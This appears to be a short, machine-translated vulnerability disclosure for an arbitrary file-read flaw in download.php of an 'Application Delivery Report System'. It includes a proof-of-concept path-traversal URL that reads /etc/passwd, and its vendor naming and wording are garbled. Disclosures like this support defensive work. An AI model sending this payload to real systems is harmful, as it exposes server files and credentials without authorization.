Deepin Service Application Delivery Report System Download Php Arbitrary File Reading Vulnerability
Deepin Service Application Delivery Report System Download Php Arbitrary File Reading Vulnerability
#Shenxinshui Application Delivery Report System download.php arbitrary file reading vulnerability
Vulnerability Description
Deepin Service Application Delivery Report System There is a random file reading vulnerability in the download.php file. The attacker can download any file on the server through the vulnerability.
Vulnerability Impact
Shenxinshui Application Delivery Report System
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/report/download.php?pdf=../../../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.